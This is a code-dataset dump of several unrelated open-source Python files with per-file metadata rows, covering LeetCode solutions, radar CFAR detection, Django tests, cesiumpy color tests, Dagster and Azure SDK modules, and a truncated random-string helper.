] | 347 | 2018-12-23T01:57:37.000Z | 2022-03-12T14:51:21.000Z | __________________________________________________________________________________________________
sample 24 ms submission
class Solution:
def complexNumberMultiply(self, a: str, b: str) -> str:
A = [int(x) for x in a.replace('i','').split('+')]
B = [int(x) for x in b.replace('i','').split('+')]
return str(A[0]*B[0]-A[1]*B[1])+'+'+str(A[0]*B[1]+A[1]*B[0])+'i'
__________________________________________________________________________________________________
sample 13124 kb submission
class Solution:
def getrc(self, strs):
val = ''
r, c = 0, 0
positive = True
for char in strs:
if char == '-':
positive = False
elif char != '+' and char != 'i':
val += char
else:
val = int(val)
if not positive: val = -val
if char == '+': r = val
else: c = val
val = ''
positive = True
return (r, c)
def complexNumberMultiply(self, a: str, b: str) -> str:
ra, ca = self.getrc(a)
rb, cb = self.getrc(b)
r = ra*rb-ca*cb
c = ra*cb+rb*ca
if r >= 0: r = str(r)
else: r = '-' + str(-r)
if c >= 0: c = str(c)
else: c = '-' + str(-c)
return r + '+' + c + 'i'
__________________________________________________________________________________________________
| 36.65 | 98 | 0.527967 | 160 | 1,466 | 3 | 0.2625 | 0.025 | 0.095833 | 0.108333 | 0.204167 | 0.1625 | 0.1625 | 0.1625 | 0 | 0 | 0 | 0.019467 | 0.334243 | 1,466 | 39 | 99 | 37.589744 | 0.472336 | 0 | 0 | 0.289474 | 0 | 0 | 0.00955 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
d1340b77da734e63775de7b3f26a9ce848c63723 | 2,160 | py | Python | radicalsdk/radardsp.py | moodoki/radical_sdk | 4438678cf73e156e5058ddb035ec8e5875fca84e | [
"Apache-2.0"
] | 7 | 2021-05-20T01:12:39.000Z | 2021-12-30T12:38:07.000Z | radicalsdk/radardsp.py | moodoki/radical_sdk | 4438678cf73e156e5058ddb035ec8e5875fca84e | [
"Apache-2.0"
] | null | null | null | radicalsdk/radardsp.py | moodoki/radical_sdk | 4438678cf73e156e5058ddb035ec8e5875fca84e | [
"Apache-2.0"
] | null | null | null | # AUTOGENERATED! DO NOT EDIT! File to edit: nbs/01_radardsp.ipynb (unless otherwise specified).
__all__ = ['cfar_nms', 'range_azimuth_ca_cfar']
# Cell
import numpy as np
from mmwave import dsp
# Cell
def cfar_nms(cfar_in, beamformed_ra, nhood_size=1):
"""non-maxumim suppression for cfar detections"""
def get_nhood(xx, yy):
return beamformed_ra[yy-nhood_size:yy+nhood_size+1, xx-nhood_size:xx+nhood_size+1]
nms_arr = np.zeros_like(cfar_in)
for yy, xx in zip(*np.where(cfar_in == 1)):
nms_arr[yy, xx] = 1 if np.all(beamformed_ra[yy, xx] >= get_nhood(xx, yy)) else 0
return nms_arr
def range_azimuth_ca_cfar(beamformed_radar_cube, nms=True):
"""Cell-Averaging CFAR on beamformed radar signal
inputs:
- `beamformed_radar_cube`
- `nms`: default `True` whether to perform non-maximum suppression
"""
range_az = np.abs(beamformed_radar_cube)
heatmap_log = np.log2(range_az)
first_pass, _ = np.apply_along_axis(func1d=dsp.cago_,
axis=0,
arr=heatmap_log,
l_bound=1.5,
guard_len=4,
noise_len=16)
# --- cfar in range direction
second_pass, noise_floor = np.apply_along_axis(func1d=dsp.caso_,
axis=0,
arr=heatmap_log.T,
l_bound=3,
guard_len=4,
noise_len=16)
# --- classify peaks and caclulate snrs
SKIP_SIZE = 4
noise_floor = noise_floor.T
first_pass = (heatmap_log > first_pass)
second_pass = (heatmap_log > second_pass.T)
peaks = (first_pass & second_pass)
peaks[:SKIP_SIZE, :] = 0
peaks[-SKIP_SIZE:, :] = 0
peaks[:, :SKIP_SIZE] = 0
peaks[:, -SKIP_SIZE:] = 0
peaks = peaks.astype('float32')
if nms:
peaks = peaks * cfar_nms(peaks, range_az, 1)
return peaks | 32.727273 | 95 | 0.539815 | 267 | 2,160 | 4.089888 | 0.359551 | 0.041209 | 0.047619 | 0.051282 | 0.169414 | 0.136447 | 0.055861 | 0.055861 | 0.055861 | 0.055861 | 0 | 0.021866 | 0.364815 | 2,160 | 66 | 96 | 32.727273 | 0.774052 | 0.17037 | 0 | 0.157895 | 1 | 0 | 0.020443 | 0.011925 | 0 | 0 | 0 | 0 | 0 | 1 | 0.078947 | false | 0.131579 | 0.052632 | 0.026316 | 0.210526 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
d13bb185fb284c7a1c5cf8f8b572524463eee700 | 276 | py | Python | duo_universal_auth/apps.py | tonningp/django-duo-universal-auth | 4a7dc91c48e0d3c6b11d2b6eebd9cedd83cd3275 | [
"BSD-3-Clause"
] | 1 | 2021-12-26T21:04:16.000Z | 2021-12-26T21:04:16.000Z | duo_universal_auth/apps.py | tonningp/django-duo-universal-auth | 4a7dc91c48e0d3c6b11d2b6eebd9cedd83cd3275 | [
"BSD-3-Clause"
] | null | null | null | duo_universal_auth/apps.py | tonningp/django-duo-universal-auth | 4a7dc91c48e0d3c6b11d2b6eebd9cedd83cd3275 | [
"BSD-3-Clause"
] | 1 | 2021-12-26T21:29:45.000Z | 2021-12-26T21:29:45.000Z | """
Module to register the Django application.
"""
from django.apps import AppConfig
class DuoUniversalAuthConfig(AppConfig):
"""
The specific AppConfig class to register for the Duo Universal
Authentication application.
"""
name = 'duo_universal_auth'
| 19.714286 | 66 | 0.728261 | 30 | 276 | 6.633333 | 0.633333 | 0.100503 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.195652 | 276 | 13 | 67 | 21.230769 | 0.896396 | 0.481884 | 0 | 0 | 0 | 0 | 0.155172 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
d142df79bef452231592066c73c02fa23e4fff32 | 398 | py | Python | firsttest/models/check.py | charlos1204/firsttest | 2c66385ae7149d1403071c2bf6da997873350556 | [
"MIT"
] | null | null | null | firsttest/models/check.py | charlos1204/firsttest | 2c66385ae7149d1403071c2bf6da997873350556 | [
"MIT"
] | null | null | null | firsttest/models/check.py | charlos1204/firsttest | 2c66385ae7149d1403071c2bf6da997873350556 | [
"MIT"
] | null | null | null | #import numpy as np
#import pickle
#import sequence2vector as s2v_tools
#y_data_name = '/data/label_dataset.pkl'#
#Y = pickle.load(open(y_data_name, 'rb'))
#print(Y.shape)
#Y = s2v_tools.seq2vectorize(Y)
#print(Y)
from keras.models import Sequential
import plotresults as pltrslts
import pickle
network = pickle.load(open("/data/history.pkl", 'rb'))
pltrslts.plot_acc_loss(network, 'save')
| 18.090909 | 54 | 0.748744 | 61 | 398 | 4.737705 | 0.52459 | 0.083045 | 0.062284 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011364 | 0.115578 | 398 | 21 | 55 | 18.952381 | 0.809659 | 0.494975 | 0 | 0 | 0 | 0 | 0.119792 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.6 | 0 | 0.6 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
d1484a9f3cc1c846f424f96a4602ea6fd126b3cd | 952 | py | Python | src/stationbook/book/tests/test_view_station_borehole_layer_add.py | EIDA/stationbook | 80d36189170328257955b236c9ed6a8657a92853 | [
"MIT"
] | 3 | 2019-02-07T18:03:56.000Z | 2020-06-30T11:09:50.000Z | src/stationbook/book/tests/test_view_station_borehole_layer_add.py | EIDA/stationbook | 80d36189170328257955b236c9ed6a8657a92853 | [
"MIT"
] | 13 | 2019-03-25T08:09:25.000Z | 2022-03-11T23:40:25.000Z | src/stationbook/book/tests/test_view_station_borehole_layer_add.py | EIDA/stationbook | 80d36189170328257955b236c9ed6a8657a92853 | [
"MIT"
] | 1 | 2019-07-26T10:23:37.000Z | 2019-07-26T10:23:37.000Z | from django.urls import resolve, reverse
from .base_classes import NetworkStationTest
from ..views import station_borehole_layer_add
class StationBoreholeLayerAddTests(NetworkStationTest):
def __init__(self, *args):
NetworkStationTest.__init__(
self,
*args,
url="station_borehole_layer_add",
arguments={"network_pk": "1", "station_pk": "1"}
)
def test_station_borehole_layer_add_view_status_code_authenticated(self):
self.login_and_refresh()
self.assertEquals(self.response.status_code, 200)
def test_station_borehole_layer_add_view_status_code_anon(self):
self.logout_and_refresh()
self.assertEquals(self.response.status_code, 302)
def test_station_borehole_layer_add_update_url_resolves_view(self):
view = resolve("/networks/1/station/1/add-borehole-layer/")
self.assertEquals(view.func, station_borehole_layer_add)
| 35.259259 | 77 | 0.726891 | 113 | 952 | 5.681416 | 0.380531 | 0.141745 | 0.186916 | 0.214953 | 0.333333 | 0.333333 | 0.286604 | 0.286604 | 0.137072 | 0 | 0 | 0.01292 | 0.186975 | 952 | 26 | 78 | 36.615385 | 0.816537 | 0 | 0 | 0 | 0 | 0 | 0.093487 | 0.070378 | 0 | 0 | 0 | 0 | 0.15 | 1 | 0.2 | false | 0 | 0.15 | 0 | 0.4 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
d14a8262549a69bf5004e70bf2d22c44d9e1fbdd | 6,594 | py | Python | cesiumpy/entities/tests/test_color.py | cksammons7/cesiumpy | 0ffa7509fdac03644f0e2fb91385106c40284aa1 | [
"Apache-2.0"
] | 62 | 2015-12-30T04:17:25.000Z | 2022-02-09T04:26:24.000Z | cesiumpy/entities/tests/test_color.py | cksammons7/cesiumpy | 0ffa7509fdac03644f0e2fb91385106c40284aa1 | [
"Apache-2.0"
] | 20 | 2016-01-19T10:07:21.000Z | 2021-11-15T18:36:45.000Z | cesiumpy/entities/tests/test_color.py | cksammons7/cesiumpy | 0ffa7509fdac03644f0e2fb91385106c40284aa1 | [
"Apache-2.0"
] | 33 | 2016-02-03T13:28:29.000Z | 2022-02-26T13:14:41.000Z | #!/usr/bin/env python
# coding: utf-8
import nose
import unittest
import traitlets
import cesiumpy
import cesiumpy.testing as tm
class TestColor(unittest.TestCase):
def test_maybe_color(self):
blue = cesiumpy.color.Color.maybe('blue')
self.assertEqual(repr(blue), "Color.BLUE")
self.assertEqual(blue.script, "Cesium.Color.BLUE")
red = cesiumpy.color.Color.maybe('RED')
self.assertEqual(repr(red), "Color.RED")
self.assertEqual(red.script, "Cesium.Color.RED")
msg = "Unable to convert to Color instance: "
with nose.tools.assert_raises_regexp(ValueError, msg):
cesiumpy.color.Color.maybe('NamedColor')
msg = "Unable to convert to Color instance: "
with nose.tools.assert_raises_regexp(ValueError, msg):
cesiumpy.color.Color.maybe('x')
msg = "Unable to convert to Color instance: "
with nose.tools.assert_raises_regexp(ValueError, msg):
cesiumpy.color.Color.maybe(1)
def test_maybe_color_listlike(self):
# tuple
c = cesiumpy.color.Color.maybe((0.5, 0.3, 0.5))
self.assertEqual(repr(c), "Color(0.5, 0.3, 0.5)")
self.assertEqual(c.script, "new Cesium.Color(0.5, 0.3, 0.5)")
c = cesiumpy.color.Color.maybe((0.5, 0.3, 0.5, 0.2))
self.assertEqual(repr(c), "Color(0.5, 0.3, 0.5, 0.2)")
self.assertEqual(c.script, "new Cesium.Color(0.5, 0.3, 0.5, 0.2)")
# do not convert
msg = "Unable to convert to Color instance: "
with nose.tools.assert_raises_regexp(ValueError, msg):
cesiumpy.color.Color.maybe((0.5, 0.3))
msg = "Unable to convert to Color instance: "
with nose.tools.assert_raises_regexp(ValueError, msg):
cesiumpy.color.Color.maybe((0.5, 0.3, 0.2, 0.1, 0.5))
def test_named_colors(self):
aqua = cesiumpy.color.AQUA
exp = "Color.AQUA"
self.assertEqual(repr(aqua), exp)
self.assertEqual(aqua.name, 'AQUA')
exp = "Cesium.Color.AQUA"
self.assertEqual(aqua.script, exp)
aqua = aqua.set_alpha(0.5)
exp = "Color.AQUA.withAlpha(0.5)"
self.assertEqual(repr(aqua), exp)
self.assertEqual(aqua.name, 'AQUA')
exp = "Cesium.Color.AQUA.withAlpha(0.5)"
self.assertEqual(aqua.script, exp)
# confirm set_alpha modifies the constant
aqua = cesiumpy.color.AQUA
exp = "Color.AQUA"
self.assertEqual(repr(aqua), exp)
self.assertEqual(aqua.name, 'AQUA')
exp = "Cesium.Color.AQUA"
self.assertEqual(aqua.script, exp)
blue = cesiumpy.color.BLUE
exp = "Color.BLUE"
self.assertEqual(repr(blue), exp)
self.assertEqual(blue.name, 'BLUE')
exp = "Cesium.Color.BLUE"
self.assertEqual(blue.script, exp)
def test_single_char_color(self):
_m = cesiumpy.color.Color.maybe
self.assertEqual(_m('b'), cesiumpy.color.BLUE)
self.assertEqual(_m('g'), cesiumpy.color.GREEN)
self.assertEqual(_m('r'), cesiumpy.color.RED)
self.assertEqual(_m('c'), cesiumpy.color.CYAN)
self.assertEqual(_m('m'), cesiumpy.color.MAGENTA)
self.assertEqual(_m('y'), cesiumpy.color.YELLOW)
self.assertEqual(_m('k'), cesiumpy.color.BLACK)
self.assertEqual(_m('w'), cesiumpy.color.WHITE)
self.assertEqual(_m('B'), cesiumpy.color.BLUE)
self.assertEqual(_m('G'), cesiumpy.color.GREEN)
self.assertEqual(_m('R'), cesiumpy.color.RED)
self.assertEqual(_m('C'), cesiumpy.color.CYAN)
self.assertEqual(_m('M'), cesiumpy.color.MAGENTA)
self.assertEqual(_m('Y'), cesiumpy.color.YELLOW)
self.assertEqual(_m('K'), cesiumpy.color.BLACK)
self.assertEqual(_m('W'), cesiumpy.color.WHITE)
def test_alpha(self):
aqua = cesiumpy.color.AQUA
res = aqua.set_alpha(0.3)
exp = "Cesium.Color.AQUA.withAlpha(0.3)"
self.assertEqual(res.script, exp)
res = aqua.withAlpha(0.3)
exp = "Cesium.Color.AQUA.withAlpha(0.3)"
self.assertEqual(res.script, exp)
res = aqua.withAlpha(1.0)
exp = "Cesium.Color.AQUA.withAlpha(1.0)"
self.assertEqual(res.script, exp)
res = aqua.withAlpha(0.0)
exp = "Cesium.Color.AQUA.withAlpha(0.0)"
self.assertEqual(res.script, exp)
msg = "The value of the 'alpha' trait of a ColorConstant instance should"
with nose.tools.assert_raises_regexp(traitlets.TraitError, msg):
aqua.withAlpha(1.1)
def test_rgb(self):
c = cesiumpy.color.Color(1, 0, 0)
exp = "new Cesium.Color(1.0, 0.0, 0.0)"
self.assertEqual(c.script, exp)
c = cesiumpy.color.Color(1, 0, 0, 0.5)
exp = "new Cesium.Color(1.0, 0.0, 0.0, 0.5)"
self.assertEqual(c.script, exp)
c = cesiumpy.color.Color.fromBytes(255, 0, 255)
exp = "new Cesium.Color(1.0, 0.0, 1.0)"
self.assertEqual(c.script, exp)
c = cesiumpy.color.Color.fromBytes(255, 0, 255, 255)
exp = "new Cesium.Color(1.0, 0.0, 1.0, 1.0)"
self.assertEqual(c.script, exp)
def test_color_string(self):
c = cesiumpy.color.Color.fromString('#FF0000')
exp = """Cesium.Color.fromCssColorString("#FF0000")"""
self.assertEqual(c.script, exp)
def test_random(self):
c = cesiumpy.color.choice()
self.assertIsInstance(c, cesiumpy.color.Color)
colors = cesiumpy.color.sample(5)
self.assertIsInstance(colors, list)
self.assertEqual(len(colors), 5)
self.assertTrue(all(isinstance(c, cesiumpy.color.Color) for c in colors))
def test_cmap(self):
tm._skip_if_no_matplotlib()
import matplotlib.pyplot as plt
mpl_cmap = plt.get_cmap('winter')
cmap = cesiumpy.color.get_cmap('winter')
exp = """ColorMap("winter")"""
self.assertEqual(repr(cmap), exp)
res = cmap(3)
exp = mpl_cmap(3)
self.assertEqual(res.red, exp[0])
self.assertEqual(res.green, exp[1])
self.assertEqual(res.blue, exp[2])
self.assertEqual(res.alpha, exp[3])
res = cmap([2, 4])
exp = mpl_cmap([2, 4])
for r, e in zip(res, exp):
self.assertEqual(r.red, e[0])
self.assertEqual(r.green, e[1])
self.assertEqual(r.blue, e[2])
self.assertEqual(r.alpha, e[3])
if __name__ == '__main__':
nose.runmodule(argv=[__file__, '-vvs', '-x', '--pdb', '--pdb-failure'],
exit=False)
| 35.074468 | 81 | 0.607067 | 894 | 6,594 | 4.400447 | 0.144295 | 0.20971 | 0.077783 | 0.058465 | 0.63879 | 0.60727 | 0.559736 | 0.531774 | 0.524911 | 0.512964 | 0 | 0.031902 | 0.244161 | 6,594 | 187 | 82 | 35.262032 | 0.757424 | 0.014407 | 0 | 0.260563 | 0 | 0.021127 | 0.150139 | 0.034955 | 0 | 0 | 0 | 0 | 0.450704 | 1 | 0.06338 | false | 0 | 0.042254 | 0 | 0.112676 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
d14d5d346317e2adeb5762d4720c2c3c5e7859a8 | 460 | py | Python | examples/docs_snippets/docs_snippets/overview/modes_resources/pipeline_with_modes.py | bitdotioinc/dagster | 4fe395a37b206b1a48b956fa5dd72bf698104cca | [
"Apache-2.0"
] | 2 | 2021-06-21T17:50:26.000Z | 2021-06-21T19:14:23.000Z | examples/docs_snippets/docs_snippets/overview/modes_resources/pipeline_with_modes.py | bitdotioinc/dagster | 4fe395a37b206b1a48b956fa5dd72bf698104cca | [
"Apache-2.0"
] | 7 | 2022-03-16T06:55:04.000Z | 2022-03-18T07:03:25.000Z | examples/docs_snippets/docs_snippets/overview/modes_resources/pipeline_with_modes.py | bitdotioinc/dagster | 4fe395a37b206b1a48b956fa5dd72bf698104cca | [
"Apache-2.0"
] | 1 | 2021-08-18T17:21:57.000Z | 2021-08-18T17:21:57.000Z | from dagster import ModeDefinition, pipeline
from .database_resources import postgres_database, sqlite_database
from .solids_with_resources import generate_table_1, generate_table_2
@pipeline(
mode_defs=[
ModeDefinition("local_dev", resource_defs={"database": sqlite_database}),
ModeDefinition("prod", resource_defs={"database": postgres_database}),
],
)
def generate_tables_pipeline():
generate_table_1()
generate_table_2()
| 28.75 | 81 | 0.767391 | 52 | 460 | 6.384615 | 0.442308 | 0.156627 | 0.13253 | 0.13253 | 0.168675 | 0.168675 | 0 | 0 | 0 | 0 | 0 | 0.010101 | 0.13913 | 460 | 15 | 82 | 30.666667 | 0.828283 | 0 | 0 | 0 | 1 | 0 | 0.063043 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.083333 | true | 0 | 0.25 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
d155115bca693ea9440a64b39244f42d954a8b6e | 5,153 | py | Python | sdk/notificationhubs/azure-mgmt-notificationhubs/azure/mgmt/notificationhubs/models/__init__.py | rsdoherty/azure-sdk-for-python | 6bba5326677468e6660845a703686327178bb7b1 | [
"MIT"
] | 2,728 | 2015-01-09T10:19:32.000Z | 2022-03-31T14:50:33.000Z | sdk/notificationhubs/azure-mgmt-notificationhubs/azure/mgmt/notificationhubs/models/__init__.py | rsdoherty/azure-sdk-for-python | 6bba5326677468e6660845a703686327178bb7b1 | [
"MIT"
] | 17,773 | 2015-01-05T15:57:17.000Z | 2022-03-31T23:50:25.000Z | sdk/notificationhubs/azure-mgmt-notificationhubs/azure/mgmt/notificationhubs/models/__init__.py | rsdoherty/azure-sdk-for-python | 6bba5326677468e6660845a703686327178bb7b1 | [
"MIT"
] | 1,916 | 2015-01-19T05:05:41.000Z | 2022-03-31T19:36:44.000Z | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
try:
from ._models_py3 import AdmCredential
from ._models_py3 import ApnsCredential
from ._models_py3 import BaiduCredential
from ._models_py3 import CheckAvailabilityParameters
from ._models_py3 import CheckAvailabilityResult
from ._models_py3 import DebugSendResponse
from ._models_py3 import ErrorResponse
from ._models_py3 import GcmCredential
from ._models_py3 import MpnsCredential
from ._models_py3 import NamespaceCreateOrUpdateParameters
from ._models_py3 import NamespaceListResult
from ._models_py3 import NamespacePatchParameters
from ._models_py3 import NamespaceResource
from ._models_py3 import NotificationHubCreateOrUpdateParameters
from ._models_py3 import NotificationHubListResult
from ._models_py3 import NotificationHubPatchParameters
from ._models_py3 import NotificationHubResource
from ._models_py3 import Operation
from ._models_py3 import OperationDisplay
from ._models_py3 import OperationListResult
from ._models_py3 import PnsCredentialsResource
from ._models_py3 import PolicykeyResource
from ._models_py3 import Resource
from ._models_py3 import ResourceListKeys
from ._models_py3 import SharedAccessAuthorizationRuleCreateOrUpdateParameters
from ._models_py3 import SharedAccessAuthorizationRuleListResult
from ._models_py3 import SharedAccessAuthorizationRuleProperties
from ._models_py3 import SharedAccessAuthorizationRuleResource
from ._models_py3 import Sku
from ._models_py3 import SubResource
from ._models_py3 import WnsCredential
except (SyntaxError, ImportError):
from ._models import AdmCredential # type: ignore
from ._models import ApnsCredential # type: ignore
from ._models import BaiduCredential # type: ignore
from ._models import CheckAvailabilityParameters # type: ignore
from ._models import CheckAvailabilityResult # type: ignore
from ._models import DebugSendResponse # type: ignore
from ._models import ErrorResponse # type: ignore
from ._models import GcmCredential # type: ignore
from ._models import MpnsCredential # type: ignore
from ._models import NamespaceCreateOrUpdateParameters # type: ignore
from ._models import NamespaceListResult # type: ignore
from ._models import NamespacePatchParameters # type: ignore
from ._models import NamespaceResource # type: ignore
from ._models import NotificationHubCreateOrUpdateParameters # type: ignore
from ._models import NotificationHubListResult # type: ignore
from ._models import NotificationHubPatchParameters # type: ignore
from ._models import NotificationHubResource # type: ignore
from ._models import Operation # type: ignore
from ._models import OperationDisplay # type: ignore
from ._models import OperationListResult # type: ignore
from ._models import PnsCredentialsResource # type: ignore
from ._models import PolicykeyResource # type: ignore
from ._models import Resource # type: ignore
from ._models import ResourceListKeys # type: ignore
from ._models import SharedAccessAuthorizationRuleCreateOrUpdateParameters # type: ignore
from ._models import SharedAccessAuthorizationRuleListResult # type: ignore
from ._models import SharedAccessAuthorizationRuleProperties # type: ignore
from ._models import SharedAccessAuthorizationRuleResource # type: ignore
from ._models import Sku # type: ignore
from ._models import SubResource # type: ignore
from ._models import WnsCredential # type: ignore
from ._notification_hubs_management_client_enums import (
AccessRights,
NamespaceType,
SkuName,
)
__all__ = [
'AdmCredential',
'ApnsCredential',
'BaiduCredential',
'CheckAvailabilityParameters',
'CheckAvailabilityResult',
'DebugSendResponse',
'ErrorResponse',
'GcmCredential',
'MpnsCredential',
'NamespaceCreateOrUpdateParameters',
'NamespaceListResult',
'NamespacePatchParameters',
'NamespaceResource',
'NotificationHubCreateOrUpdateParameters',
'NotificationHubListResult',
'NotificationHubPatchParameters',
'NotificationHubResource',
'Operation',
'OperationDisplay',
'OperationListResult',
'PnsCredentialsResource',
'PolicykeyResource',
'Resource',
'ResourceListKeys',
'SharedAccessAuthorizationRuleCreateOrUpdateParameters',
'SharedAccessAuthorizationRuleListResult',
'SharedAccessAuthorizationRuleProperties',
'SharedAccessAuthorizationRuleResource',
'Sku',
'SubResource',
'WnsCredential',
'AccessRights',
'NamespaceType',
'SkuName',
]
| 44.422414 | 94 | 0.751213 | 437 | 5,153 | 8.624714 | 0.203661 | 0.1645 | 0.106925 | 0.156275 | 0.206951 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007478 | 0.16961 | 5,153 | 115 | 95 | 44.808696 | 0.873335 | 0.165923 | 0 | 0 | 0 | 0 | 0.162714 | 0.097206 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.609524 | 0 | 0.609524 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
d1592de01ccfcfaa6800db9a077337ed4875fae8 | 1,723 | py | Python | shaping.py | kotikkonstantin/convasr | 3d4d7f3627269372ae1eb7ff7423b29838f47ac0 | [
"MIT"
] | 17 | 2019-08-01T07:45:46.000Z | 2022-03-25T05:15:13.000Z | shaping.py | kotikkonstantin/convasr | 3d4d7f3627269372ae1eb7ff7423b29838f47ac0 | [
"MIT"
] | 14 | 2020-05-30T16:18:28.000Z | 2021-06-24T08:08:19.000Z | shaping.py | kotikkonstantin/convasr | 3d4d7f3627269372ae1eb7ff7423b29838f47ac0 | [
"MIT"
] | 6 | 2020-07-10T14:43:02.000Z | 2021-04-08T19:28:53.000Z | import functools
import typing
import torch
# equal to 1T
class _T(torch.Tensor):
pass
class BY(torch.Tensor):
pass
class T(torch.Tensor):
pass
class B(torch.Tensor):
pass
class S(torch.Tensor):
pass
class BCT(torch.Tensor):
pass
class CT(torch.Tensor):
pass
class BCt(torch.Tensor):
pass
class Bt(torch.Tensor):
pass
class TBC(torch.Tensor):
pass
class BT(torch.Tensor):
pass
class BLY(torch.Tensor):
pass
class BS(torch.Tensor):
pass
def is_tensor_hint(cls):
return issubclass(cls, torch.Tensor)
def unbind_tensor_hint(cls):
dims = cls.__name__.split('.')[-1]
return dims
def shapecheck(hints = None, auto = None, **kwargs):
if auto is not None:
def decorator(fn):
@functools.wraps(fn)
def wrapper(*args, **kwargs):
shapecheck.hints = typing.get_type_hints(fn)
if auto:
shapecheck(hints = {}, **kwargs)
res = fn(*args, **kwargs)
if auto:
shapecheck(hints = {}, **kwargs, **{'return' : res})
shapecheck.hints = {}
return res
return wrapper
return decorator
else:
hints = hints or shapecheck.hints
dims = {}
for k, v in kwargs.items():
h = hints.get(k)
if h is not None:
if is_tensor_hint(h):
tensor_dims = unbind_tensor_hint(h)
assert v.ndim == len(tensor_dims), f'Tensor [{k}] should be typed [{tensor_dims}] and should have rank {len(tensor_dims)} but has rank [v.ndim]'
for i, d in enumerate(tensor_dims):
s = v.shape[i]
if d in dims:
assert dims[d] == s, f'Tensor [{k}] should be typed [{tensor_dims}], dim [{d}] should have rank [{dims[d]}] but has rank [{s}]'
dims[d] = s
else:
assert isinstance(v, h), f'Arg [{k}] should be typed [{h}] but is typed [{type(v)}]'
| 20.270588 | 149 | 0.647707 | 266 | 1,723 | 4.116541 | 0.274436 | 0.140639 | 0.178082 | 0.219178 | 0.290411 | 0.241096 | 0.193607 | 0.193607 | 0.136986 | 0 | 0 | 0.001466 | 0.208358 | 1,723 | 84 | 150 | 20.511905 | 0.80132 | 0.006384 | 0 | 0.261538 | 0 | 0.030769 | 0.159064 | 0 | 0 | 0 | 0 | 0 | 0.046154 | 1 | 0.076923 | false | 0.2 | 0.046154 | 0.015385 | 0.4 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
d15d785d728aebc40b0768e439bd949eef225e9d | 1,867 | py | Python | qingmi/utils/crypto.py | xiongxianzhu/qingmi | ae5a446abec3982ebf2c5dde8546ef72f9453137 | [
"BSD-3-Clause"
] | 20 | 2018-05-22T09:29:40.000Z | 2020-12-11T04:53:15.000Z | qingmi/utils/crypto.py | xiongxianzhu/qingmi | ae5a446abec3982ebf2c5dde8546ef72f9453137 | [
"BSD-3-Clause"
] | 65 | 2019-03-07T02:43:06.000Z | 2021-01-07T03:43:52.000Z | qingmi/utils/crypto.py | xiongxianzhu/qingmi | ae5a446abec3982ebf2c5dde8546ef72f9453137 | [
"BSD-3-Clause"
] | 6 | 2019-03-08T06:39:47.000Z | 2021-07-01T11:02:56.000Z | # coding: utf-8
"""
Qingmi's standard crypto functions and utilities.
"""
import hashlib
import hmac
import random
import time
import base64
def get_random_string(length=12,
allowed_chars='abcdefghijklmnopqrstuvwxyz'
'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'):
